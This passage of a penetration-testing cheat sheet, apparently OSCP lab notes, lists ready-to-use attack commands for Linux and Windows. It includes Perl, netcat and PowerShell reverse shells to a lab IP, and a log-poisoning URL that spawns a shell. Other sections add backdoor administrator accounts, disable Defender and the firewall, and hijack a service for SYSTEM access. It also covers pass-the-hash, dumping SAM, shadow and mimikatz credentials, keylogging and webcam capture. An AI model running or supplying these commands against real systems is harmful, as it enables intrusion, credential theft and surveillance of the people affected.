1164 | perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1165 |
1166 | # Windows
1167 | nc -e cmd.exe 10.11.1.111 4443
1168 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
1169 |
1170 | # PHP most simple Linux
1171 | $sock, 1=>$sock, 2=>$sock), $pipes);?>
1172 | ```
1173 |
1174 | # **Privilege escalation**
1175 |
1176 | ## Common
1177 |
1178 | ```
1179 | # Docker
1180 | https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/
1181 |
1182 | ```
1183 |
1184 | ### Set up Webserver
1185 |
1186 | ```
1187 | python -m SimpleHTTPServer 8080
1188 | https://github.com/sc0tfree/updog
1189 | updog
1190 | ```
1191 |
1192 | ### Set up FTP Server
1193 |
1194 | ```
1195 | # Install pyftpdlib
1196 | pip install pyftpdlib
1197 |
1198 | # Run (-w flag allows anonymous write access)
1199 | python -m pyftpdlib -p 21 -w
1200 | ```
1201 |
1202 | ### Set up TFTP
1203 |
1204 | ````
1205 | # In Kali
1206 | atftpd --daemon --port 69 /tftp
1207 |
1208 | # In reverse Windows
1209 | tftp -i 10.11.1.111 GET nc.exe
1210 | nc.exe -e cmd.exe 10.11.1.111 4444
1211 |
1212 | http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444
1213 | ````
1214 |
1215 | ## Linux
1216 |
1217 | Now we start the whole enumeration-process over gain.
1218 |
1219 | - Kernel exploits
1220 | - Programs running as root
1221 | - Installed software
1222 | - Weak/reused/plaintext passwords
1223 | - Inside service
1224 | - Suid misconfiguration
1225 | - World writable scripts invoked by root
1226 | - Unmounted filesystems
1227 | - Look in /var/backups
1228 | - Look in /etc/fstab y en mount
1229 |
1230 | Less likely
1231 |
1232 | - Private ssh keys
1233 | - Bad path configuration
1234 | - Cronjobs
1235 |
1236 | ### Useful commands
1237 |
1238 | ```
1239 | # Spawning shell
1240 | python -c 'import pty; pty.spawn("/bin/bash")'
1241 | python -c 'import pty; pty.spawn("/bin/sh")'
1242 | V
1243 | Ctrl+Z
1244 | stty raw -echo
1245 | fg
1246 | reset
1247 | Ctrl+Z
1248 | stty size
1249 | stty -rows 48 -columns 120
1250 | fg
1251 |
1252 | echo os.system('/bin/bash')
1253 | /bin/sh -i
1254 | perl -e 'exec "/bin/sh";'
1255 | perl: exec "/bin/sh";
1256 | ruby: exec "/bin/sh"
1257 | lua: os.execute('/bin/sh')
1258 | (From within vi)
1259 | :!bash
1260 | :set shell=/bin/bash:shell
1261 | (From within nmap)
1262 | !sh
1263 |
1264 | # Access to more binaries
1265 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
1266 |
1267 | # Set up webserver
1268 | cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080
1269 |
1270 | # Download all files
1271 | wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check
1272 |
1273 | ./LinEnum.sh -t -k password -r LinEnum.txt
1274 | python linprivchecker.py extended
1275 | ./unix-privesc-check standard
1276 |
1277 | # Writable directories
1278 | /tmp
1279 | /var/tmp
1280 |
1281 | # Add user to sudoers
1282 | useradd hacker
1283 | passwd hacker
1284 | echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
1285 | ```
1286 |
1287 | ### Basic info
1288 |
1289 | ```
1290 | uname -a
1291 | env
1292 | id
1293 | cat /proc/version
1294 | cat /etc/issue
1295 | cat /etc/passwd
1296 | cat /etc/group
1297 | cat /etc/shadow
1298 | cat /etc/hosts
1299 |
1300 | # Users with login
1301 | grep -vE "nologin" /etc/passwd
1302 |
1303 | # Priv Enumeration Scripts
1304 | upload /unix-privesc-check
1305 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
1306 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./
1307 |
1308 | python linprivchecker.py extended
1309 | ./LinEnum.sh -t -k password
1310 | unix-privesc-check
1311 | ```
1312 |
1313 | ### Kernel exploits
1314 |
1315 | ```
1316 | site:exploit-db.com kernel version
1317 |
1318 | perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6
1319 |
1320 | python linprivchecker.py extended
1321 | ```
1322 |
1323 | ### Programs running as root
1324 |
1325 | Look for webserver, mysql or anything else like that.
1326 |
1327 | ```
1328 | # Metasploit
1329 | ps
1330 |
1331 | # Linux
1332 | ps aux
1333 | ```
1334 |
1335 | ### Installed software
1336 |
1337 | ```
1338 | /usr/local/
1339 | /usr/local/src
1340 | /usr/local/bin
1341 | /opt/
1342 | /home
1343 | /var/
1344 | /usr/src/
1345 |
1346 | # Debian
1347 | dpkg -l
1348 |
1349 | # CentOS, OpenSuse, Fedora, RHEL
1350 | rpm -qa (CentOS / openSUSE )
1351 |
1352 | # OpenBSD, FreeBSD
1353 | pkg_info
1354 | ```
1355 |
1356 | ### Weak/reused/plaintext passwords
1357 |
1358 | - Check database config-file
1359 | - Check databases
1360 | - Check weak passwords
1361 |
1362 | ```
1363 | username:username
1364 | username:username1
1365 | username:root
1366 | username:admin
1367 | username:qwerty
1368 | username:password
1369 | ```
1370 |
1371 | - Check plaintext
1372 |
1373 | ```
1374 | ./LinEnum.sh -t -k password
1375 | ```
1376 |
1377 | ### Inside service
1378 |
1379 | ```
1380 | # Linux
1381 | netstat -anlp
1382 | netstat -ano
1383 | ```
1384 |
1385 | ### Suid misconfiguration
1386 |
1387 | Binary with suid permission can be run by anyone, but when they are run they are run as root!
1388 |
1389 | Example programs:
1390 |
1391 | ```
1392 | nmap
1393 | vim
1394 | nano
1395 | ```
1396 |
1397 | ```
1398 | # SUID
1399 | find / -perm -4000 -type f 2>/dev/null
1400 |
1401 | # ALL PERMS
1402 | find / -perm -777 -type f 2>/dev/null
1403 |
1404 | # SUID for current user
1405 | find / perm /u=s -user `whoami` 2>/dev/null
1406 | find / -user root -perm -4000 -print 2>/dev/null
1407 |
1408 | # Writables for current user/group
1409 | find / perm /u=w -user `whoami` 2>/dev/null
1410 | find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
1411 | find / -perm /u+w -user `whoami` 2>/dev/nul
1412 |
1413 | # Dirs with +w perms for current u/g
1414 | find / perm /u=w -type -d -user `whoami` 2>/dev/null
1415 | find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
1416 | ```
1417 |
1418 | ### Unmounted filesystems
1419 |
1420 | Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.
1421 |
1422 | ```
1423 | mount -l
1424 | ```
1425 |
1426 | ### Cronjob
1427 |
1428 | Look for anything that is owned by privileged user but writable for you
1429 |
1430 | ```
1431 | crontab -l
1432 | ls -alh /var/spool/cron
1433 | ls -al /etc/ | grep cron
1434 | ls -al /etc/cron*
1435 | cat /etc/cron*
1436 | cat /etc/at.allow
1437 | cat /etc/at.deny
1438 | cat /etc/cron.allow
1439 | cat /etc/cron.deny
1440 | cat /etc/crontab
1441 | cat /etc/anacrontab
1442 | cat /var/spool/cron/crontabs/root
1443 | ```
1444 |
1445 | ### SSH Keys
1446 |
1447 | Check all home directories
1448 |
1449 | ```
1450 | cat ~/.ssh/authorized_keys
1451 | cat ~/.ssh/identity.pub
1452 | cat ~/.ssh/identity
1453 | cat ~/.ssh/id_rsa.pub
1454 | cat ~/.ssh/id_rsa
1455 | cat ~/.ssh/id_dsa.pub
1456 | cat ~/.ssh/id_dsa
1457 | cat /etc/ssh/ssh_config
1458 | cat /etc/ssh/sshd_config
1459 | cat /etc/ssh/ssh_host_dsa_key.pub
1460 | cat /etc/ssh/ssh_host_dsa_key
1461 | cat /etc/ssh/ssh_host_rsa_key.pub
1462 | cat /etc/ssh/ssh_host_rsa_key
1463 | cat /etc/ssh/ssh_host_key.pub
1464 | cat /etc/ssh/ssh_host_key
1465 | ```
1466 |
1467 | ### Bad path configuration
1468 |
1469 | Require user interaction
1470 |
1471 | ### Find plain passwords
1472 |
1473 | ```
1474 | grep -rnw '/' -ie 'pass' --color=always
1475 | grep -rnw '/' -ie 'DB_PASS' --color=always
1476 | grep -rnw '/' -ie 'DB_PASSWORD' --color=always
1477 | grep -rnw '/' -ie 'DB_USER' --color=always
1478 | ```
1479 |
1480 | ### Scripts
1481 |
1482 | #### SUID
1483 |
1484 | ```
1485 | int main(void){
1486 | setresuid(0, 0, 0);
1487 | system("/bin/bash");
1488 | }
1489 |
1490 | # Compile
1491 | gcc suid.c -o suid
1492 | ```
1493 |
1494 | #### PS Monitor for cron
1495 |
1496 | ```
1497 | #!/bin/bash
1498 |
1499 | # Loop by line
1500 | IFS=$'\n'
1501 |
1502 | old_process=$(ps -eo command)
1503 |
1504 | while true; do
1505 | new_process=$(ps -eo command)
1506 | diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
1507 | sleep 1
1508 | old_process=$new_process
1509 | done
1510 |
1511 | ```
1512 |
1513 | ### Linux Privesc Tools
1514 |
1515 | - [GTFOBins](https://gtfobins.github.io/)
1516 | - [LinEnum](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh)
1517 | - [LinuxExploitSuggester](https://gitlab.com/kalilinux/packages/linux-exploit-suggester/blob/kali/master/Linux_Exploit_Suggester.pl)
1518 | - [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py)
1519 |
1520 | ### Linux Precompiled Exploits
1521 | - [kernel-exploits](https://github.com/lucyoa/kernel-exploits)
1522 |
1523 | ## Windows
1524 |
1525 | Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order.
1526 |
1527 | - Kernel exploits
1528 | - Cleartext password
1529 | - Reconfigure service parameters
1530 | - Inside service
1531 | - Program running as root
1532 | - Installed software
1533 | - Scheduled tasks
1534 | - Weak passwords
1535 |
1536 | ### Basic info
1537 |
1538 | ```
1539 | systeminfo
1540 | set
1541 | hostname
1542 | net users
1543 | net user user1
1544 | net localgroups
1545 | accesschk.exe -uwcqv "Authenticated Users" *
1546 |
1547 | netsh firewall show state
1548 | netsh firewall show config
1549 |
1550 | # Set path
1551 | set PATH=%PATH%;C:\xampp\php
1552 |
1553 | whoami /priv
1554 |
1555 | dir/a -> Show hidden & unhidden files
1556 | dir /Q -> Show permissions
1557 | ```
1558 |
1559 | ### Kernel exploits
1560 |
1561 |
1562 | ```
1563 | # Look for hotfixes
1564 | systeminfo
1565 |
1566 | wmic qfe get Caption,Description,HotFixID,InstalledOn
1567 |
1568 | # Search for exploits
1569 | site:exploit-db.com windows XX XX
1570 | ```
1571 |
1572 | ### Cleartext passwords
1573 |
1574 | ```
1575 | # Windows autologin
1576 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
1577 |
1578 | # VNC
1579 | reg query "HKCU\Software\ORL\WinVNC3\Password"
1580 |
1581 | # SNMP Parameters
1582 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
1583 |
1584 | # Putty
1585 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
1586 |
1587 | # Search for password in registry
1588 | reg query HKLM /f password /t REG_SZ /s
1589 | reg query HKCU /f password /t REG_SZ /s
1590 | ```
1591 |
1592 | ### Reconfigure service parameters
1593 |
1594 | - Unquoted service paths
1595 |
1596 | - Weak service permissions
1597 |
1598 | https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
1599 |
1600 | ### Dump process for passwords
1601 |
1602 | ```powershell
1603 | # Looking for Firefox
1604 | Get-Process
1605 | ./procdump64.exe -ma $PID-FF
1606 | Select-String -Path .\*.dmp -Pattern 'password' > 1.txt
1607 | type 1.txt | findstr /s /i "admin"
1608 | ```
1609 |
1610 | ### Inside service
1611 |
1612 | Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside.
1613 |
1614 | ```
1615 | # Meterpreter
1616 | run get_local_subnets
1617 |
1618 | netstat /a
1619 | netstat -ano
1620 | ```
1621 |
1622 | ### Programs running as root/system
1623 |
1624 | ### Installed software
1625 |
1626 | ```
1627 | # Metasploit
1628 | ps
1629 |
1630 | tasklist /SVC
1631 | net start
1632 | reg query HKEY_LOCAL_MACHINE\SOFTWARE
1633 | DRIVERQUERY
1634 |
1635 | Look in:
1636 | C:\Program files
1637 | C:\Program files (x86)
1638 | Home directory of the user
1639 | ```
1640 |
1641 | ### Scheduled tasks
1642 |
1643 | ```
1644 | schtasks /query /fo LIST /v
1645 |
1646 | Check this file:
1647 | c:\WINDOWS\SchedLgU.Txt
1648 | ```
1649 |
1650 | ### Weak passwords
1651 |
1652 | Remote desktop
1653 |
1654 | ```
1655 | ncrack -vv --user george -P /root/oscp/passwords.txt rdp://10.11.1.111
1656 | ```
1657 |
1658 | ### Add user and enable RDP
1659 |
1660 | ```
1661 | # Add new user
1662 |
1663 | net user haxxor Haxxor123 /add
1664 | net localgroup Administrators haxxor /add
1665 | net localgroup "Remote Desktop Users" haxxor /ADD
1666 |
1667 | # Turn firewall off and enable RDP
1668 |
1669 | sc stop WinDefend
1670 | netsh advfirewall show allprofiles
1671 | netsh advfirewall set allprofiles state off
1672 | netsh firewall set opmode disable
1673 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
1674 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
1675 | ```
1676 |
1677 | ### Powershell sudo for Windows
1678 |
1679 | ```
1680 | $pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
1681 | $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
1682 | $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
1683 | Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
1684 |
1685 | powershell -ExecutionPolicy Bypass -File xyz.ps1
1686 | ```
1687 |
1688 | ### Windows download with bitsadmin
1689 |
1690 | ```
1691 | bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
1692 | ```
1693 |
1694 | ### Windows download with certutil.exe
1695 |
1696 | ```
1697 | certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat
1698 | ```
1699 |
1700 | ### Windows download with powershell
1701 |
1702 | ````
1703 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.1.111/file.exe','C:\Users\user\Desktop\file.exe')"
1704 |
1705 | (New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")
1706 | ````
1707 |
1708 | ### Windows Download from FTP
1709 |
1710 | ```
1711 | # In reverse shell
1712 | echo open 10.11.1.111 > ftp.txt
1713 | echo USER anonymous >> ftp.txt
1714 | echo ftp >> ftp.txt
1715 | echo bin >> ftp.txt
1716 | echo GET file >> ftp.txt
1717 | echo bye >> ftp.txt
1718 |
1719 | # Execute
1720 | ftp -v -n -s:ftp.txt
1721 | ```
1722 |
1723 | ### Windows create SMB Server transfer files
1724 |
1725 | ```bash
1726 | # Attack machine
1727 | python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111"
1728 |
1729 | # Or SMB service
1730 | # http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
1731 | vim /etc/samba/smb.conf
1732 | [global]
1733 | workgroup = WORKGROUP
1734 | server string = Samba Server %v
1735 | netbios name = indishell-lab
1736 | security = user
1737 | map to guest = bad user
1738 | name resolve order = bcast host
1739 | dns proxy = no
1740 | bind interfaces only = yes
1741 |
1742 | [ica]
1743 | path = /var/www/html/pub
1744 | writable = no
1745 | guest ok = yes
1746 | guest only = yes
1747 | read only = yes
1748 | directory mode = 0555
1749 | force user = nobody
1750 |
1751 | chmod -R 777 smb_path
1752 | chown -R nobody:nobody smb_path
1753 | service smbd restart
1754 |
1755 | # Victim machine with reverse shell
1756 | Download: copy \\10.11.1.111\Lab\wce.exe .
1757 | Upload: copy wtf.jpg \\10.11.1.111\Lab
1758 |
1759 | ```
1760 |
1761 | ### Windows download with VBS
1762 |
1763 | ````
1764 | # In reverse shell
1765 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs
1766 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
1767 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
1768 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
1769 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
1770 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
1771 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
1772 | echo Err.Clear >> wget.vbs
1773 | echo Set http = Nothing >> wget.vbs
1774 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
1775 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
1776 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
1777 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
1778 | echo http.Open "GET",strURL,False >> wget.vbs
1779 | echo http.Send >> wget.vbs
1780 | echo varByteArray = http.ResponseBody >> wget.vbs
1781 | echo Set http = Nothing >> wget.vbs
1782 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
1783 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
1784 | echo strData = "" >> wget.vbs
1785 | echo strBuffer = "" >> wget.vbs
1786 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
1787 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
1788 | echo Next >> wget.vbs
1789 | echo ts.Close >> wget.vbs
1790 |
1791 | # Execute
1792 | cscript wget.vbs http://10.11.1.111/file.exe file.exe
1793 | ````
1794 |
1795 | ### Windowss XP SP1 PrivEsc
1796 |
1797 | ```bash
1798 | sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe"
1799 | sc config upnphost obj= ".\LocalSystem" password= ""
1800 | sc qc upnphost
1801 | sc config upnphost depend= ""
1802 | net start upnphost
1803 | ```
1804 |
1805 | ### Pass The Hash
1806 |
1807 | ```
1808 | # Login as user only with hashdump
1809 | # From this hashdump
1810 | # admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
1811 |
1812 | msf5 > use exploit/windows/smb/psexec
1813 | msf5 exploit(windows/smb/psexec) > options
1814 |
1815 | Module options (exploit/windows/smb/psexec):
1816 |
1817 | Name Current Setting Required Description
1818 | ---- --------------- -------- -----------
1819 | RHOSTS yes The target address range or CIDR identifier
1820 | RPORT 445 yes The SMB service port (TCP)
1821 | SERVICE_DESCR10.11.1.111TION no Service description to to be used on target for pretty listing
1822 | SERVICE_DISPLAY_NAME no The service display name
1823 | SERVICE_NAME no The service name
1824 | SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
1825 | SMBDomain . no The Windows domain to use for authentication
1826 | SMBPass no The password for the specified username
1827 | SMBUser no The username to authenticate as
1828 |
1829 | Exploit target:
1830 |
1831 | Id Name
1832 | -- ----
1833 | 0 Automatic
1834 |
1835 | msf5 exploit(windows/smb/psexec) > set rhosts 10.10.0.100
1836 | rhosts => 10.10.0.100
1837 |
1838 | msf5 exploit(windows/smb/psexec) > set smbuser admin2
1839 |
1840 | smbuser => admin2
1841 |
1842 | msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7
1843 |
1844 | smbpass => aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7
1845 |
1846 | msf5 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
1847 |
1848 | payload => windows/x64/meterpreter/reverse_tcp
1849 |
1850 | ```
1851 |
1852 | ### Scripts
1853 |
1854 | #### Useradd
1855 |
1856 | ````
1857 | #include /* system, NULL, EXIT_FAILURE */
1858 |
1859 | int main ()
1860 | {
1861 | int i;
1862 | i=system ("net user /add && net localgroup administrators /add");
1863 | return 0;
1864 | }
1865 |
1866 | # Compile
1867 | i686-w64-mingw32-gcc -o useradd.exe useradd.c
1868 | ````
1869 |
1870 | #### Powershell Run As
1871 |
1872 | ```
1873 | echo $username = '' > runas.ps1
1874 | echo $securePassword = ConvertTo-SecureString "" -AsPlainText -Force >> runas.ps1
1875 | echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
1876 | echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
1877 | ```
1878 |
1879 | #### Powershell Reverse Shell
1880 |
1881 | ```powershell
1882 | Set-ExecutionPolicy Bypass
1883 |
1884 | $client = New-Object System.Net.Sockets.TCPClient('10.11.1.111',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
1885 | ```
1886 |
1887 |
1888 |
1889 | ### Windows privesc/enum tools
1890 |
1891 | - [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
1892 | - [windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check)
1893 | - [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1)
1894 |
1895 | ### Windows precompiled exploits
1896 |
1897 | - [WindowsExploits](https://github.com/abatchy17/WindowsExploits)
1898 |
1899 | ### Windows Port Forwarding
1900 |
1901 | Run in victim (5985 WinRM):
1902 |
1903 | `plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221`
1904 |
1905 |
1906 |
1907 | # **Loot**
1908 |
1909 | ## Linux
1910 |
1911 | **Checklist**
1912 |
1913 | - Proof:
1914 | - Network secret:
1915 | - Passwords and hashes:
1916 | - Dualhomed:
1917 | - Tcpdump:
1918 | - Interesting files:
1919 | - Databases:
1920 | - SSH-keys:
1921 | - Browser:
1922 | - Mail:
1923 |
1924 | ### Proof
1925 | ```
1926 | echo -e '\n'HOSTNAME: && hostname && echo -e '\n'WHOAMI: && whoami && echo -e '\n'PROOF: && cat proof.txt && echo -e '\n'IFCONFIG: && /sbin/ifconfig && echo -e '\n'PASSWD: && cat /etc/passwd && echo -e '\n'SHADOW: && cat /etc/shadow && echo -e '\n'NETSTAT: && netstat -antup
1927 | ```
1928 |
1929 |
1930 | ### Network secret
1931 |
1932 | ```
1933 | /root/network-secret.txt
1934 | ```
1935 |
1936 | ### Passwords and hashes
1937 |
1938 | ```
1939 | cat /etc/passwd
1940 | cat /etc/shadow
1941 |
1942 | unshadow passwd shadow > unshadowed.txt
1943 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
1944 | ```
1945 |
1946 | ### Dualhomed
1947 |
1948 | ```
1949 | ifconfig
1950 | ifconfig -a
1951 | arp -a
1952 | ```
1953 |
1954 | ### Tcpdump
1955 |
1956 | ```
1957 | tcpdump -i any -s0 -w capture.pcap
1958 | tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
1959 | tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111
1960 | ```
1961 |
1962 | ### Interesting files
1963 |
1964 | ```
1965 | #Meterpreter
1966 | search -f *.txt
1967 | search -f *.zip
1968 | search -f *.doc
1969 | search -f *.xls
1970 | search -f config*
1971 | search -f *.rar
1972 | search -f *.docx
1973 | search -f *.sql
1974 | use auxiliary/sniffer/psnuffle
1975 |
1976 | .ssh:
1977 | .bash_history
1978 | ```
1979 |
1980 | ### Databases
1981 |
1982 | ### SSH-Keys
1983 |
1984 | ### Browser
1985 |
1986 | ### Mail
1987 |
1988 | ```
1989 | /var/mail
1990 | /var/spool/mail
1991 | ```
1992 |
1993 | ### GUI
1994 |
1995 | If there is a gui we want to check out the browser.
1996 |
1997 | ```
1998 | echo $DESKTOP_SESSION
1999 | echo $XDG_CURRENT_DESKTOP
2000 | echo $GDMSESSION
2001 | ```
2002 |
2003 | ## Windows
2004 |
2005 | ### Proof
2006 | ```
2007 | hostname && whoami.exe && type proof.txt && ipconfig /all
2008 | ```
2009 |
2010 | ### Passwords and hashes
2011 |
2012 | ```
2013 | wce32.exe -w
2014 | wce64.exe -w
2015 | fgdump.exe
2016 |
2017 | # Loot passwords without tools
2018 | reg.exe save hklm\sam c:\sam_backup
2019 | reg.exe save hklm\security c:\security_backup
2020 | reg.exe save hklm\system c:\system
2021 |
2022 | # Meterpreter
2023 | hashdump
2024 | load mimikatz
2025 | msv
2026 | ```
2027 |
2028 | ### Dualhomed
2029 |
2030 | ```
2031 | ipconfig /all
2032 | route print
2033 |
2034 | # What other machines have been connected
2035 | arp -a
2036 | ```
2037 |
2038 | ### Tcpdump
2039 |
2040 | ```
2041 | # Meterpreter
2042 | run packetrecorder -li
2043 | run packetrecorder -i 1
2044 | ```
2045 |
2046 | ### Interesting files
2047 |
2048 | ```
2049 | #Meterpreter
2050 | search -f *.txt
2051 | search -f *.zip
2052 | search -f *.doc
2053 | search -f *.xls
2054 | search -f config*
2055 | search -f *.rar
2056 | search -f *.docx
2057 | search -f *.sql
2058 | hashdump
2059 | keysscan_start
2060 | keyscan_dump
2061 | keyscan_stop
2062 | webcam_snap
2063 |
2064 | # How to cat files in meterpreter
2065 | cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt
2066 |
2067 | # Recursive search
2068 | dir /s
2069 | ```
2070 |
--------------------------------------------------------------------------------